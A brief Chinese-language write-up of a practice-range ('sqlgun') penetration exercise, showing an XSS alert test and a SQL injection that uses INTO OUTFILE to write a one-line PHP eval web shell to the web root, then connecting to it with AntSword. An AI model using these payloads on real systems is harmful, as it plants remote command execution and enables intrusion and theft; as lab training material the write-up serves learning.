sqlgun靶场漏洞挖掘
1.xss漏洞
搜索框输入以下代码,验证是否存在xss漏洞
<script>alert(1)</script>
OK了,存在xss漏洞
2.SQL注入
经过测试,输入框存在SQL注入漏洞
查询数据库名
查询管理员账号密码
此处密码为MD5加密,解码内容如下
找了半天,没有找到管理员登录界面,所以找到管理员账号和密码没有用,虽然没有,但是证明了一点,那就是此处可以无限制输入命令,并执行,通过扫描目录发现存在phpinfo文件,访问得知网站绝对路径
于是乎,尝试使用sql注入的方式,上传一句话木马
-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/www.php' #
根据设定的地址访问上传的文件
写入成功,蚁剑连接大脑,cmd代替思考
完事🧐